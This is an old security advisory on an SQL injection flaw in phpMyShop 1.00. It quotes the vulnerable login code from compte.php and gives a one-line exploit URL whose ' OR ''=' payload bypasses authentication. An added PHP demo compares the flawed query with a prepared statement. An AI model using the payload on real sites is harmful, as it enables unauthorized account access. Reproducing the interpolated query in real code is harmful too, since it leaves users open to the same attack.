phpMyShop (php)

by Nikola Strahija on February 4th, 2003

There is an SQL injection problem in the phpMyShop application.


Information :
°°°°°°°°°°°°°
Version : 1.00
Website : http://www.pc-encheres.com
Problem : SQL Injection


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
compte.php :
---------------------------------------------------------------
session_start();

if (isset($achat))
{
session_register("achat");
}
else
{
header("location:index.php");
}

include("design/header.php");
require("config.php");
require("fonction.php");

echo" size="$width_police2">Identification



";

if (isset($valider))
{
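// $identifiant and $password arrive from the request and are placed
// into the query text unescaped: this is the injection point.
$sql = "SELECT id_cli,login_cli,pass_cli FROM $table_client where
login_cli='$identifiant' and pass_cli='$password'";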
$sql = mysql_db_query($base,$sql);
$test = mysql_num_rows($sql);
if ($test=="0")
{
?>

echo"

Identifiant ou mot de passe non
valide!

";
}
else
{
$id_membre = mysql_result($sql,0,"id_cli");
session_register("id_membre");
?>

}
}

[...]
---------------------------------------------------------------



Exploit :
°°°°°°°°°
http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='


Solution :
°°°°°°°°°°
A patch has been published on http://www.phpsecure.info .
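
The flaw and one way to close it, as an added example that is neither the phpsecure.info patch nor phpMyShop's own code: the login query from compte.php built by string interpolation and as a prepared statement. The in-memory SQLite database, the `client` table name, the sample row and both function names are assumptions made for this demo.

```php
<?php
// Added example. Column names follow compte.php; the SQLite in-memory
// database, table name "client" and the sample account are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE client (id_cli INTEGER PRIMARY KEY, login_cli TEXT, pass_cli TEXT)");
$db->prepare("INSERT INTO client (login_cli, pass_cli) VALUES (?, ?)")
   ->execute(['alice', 's3cret']);

// Same construction as compte.php: request values become part of the SQL text,
// so a quote character in either value changes the structure of the WHERE clause.
function login_vulnerable(PDO $db, string $identifiant, string $password): ?int
{
    $sql = "SELECT id_cli FROM client WHERE login_cli='$identifiant' AND pass_cli='$password'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? (int) $row['id_cli'] : null;
}

// Hardened form: the statement is parsed first, then the values are bound
// as data, so quotes in the input are compared literally.
function login_prepared(PDO $db, string $identifiant, string $password): ?int
{
    $stmt = $db->prepare("SELECT id_cli FROM client WHERE login_cli = ? AND pass_cli = ?");
    $stmt->execute([$identifiant, $password]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? (int) $row['id_cli'] : null;
}

// The value from the advisory's URL, URL-decoded. In the interpolated query
// it yields a clause ending in OR ''='' which is true for every row; in the
// prepared query it is just a login name that does not exist.
$payload = "' OR ''='";
var_dump(login_vulnerable($db, $payload, $payload));
var_dump(login_prepared($db, $payload, $payload));
var_dump(login_prepared($db, 'alice', 's3cret'));
```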



More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/phpmyshop.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2Fphpmyshop.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


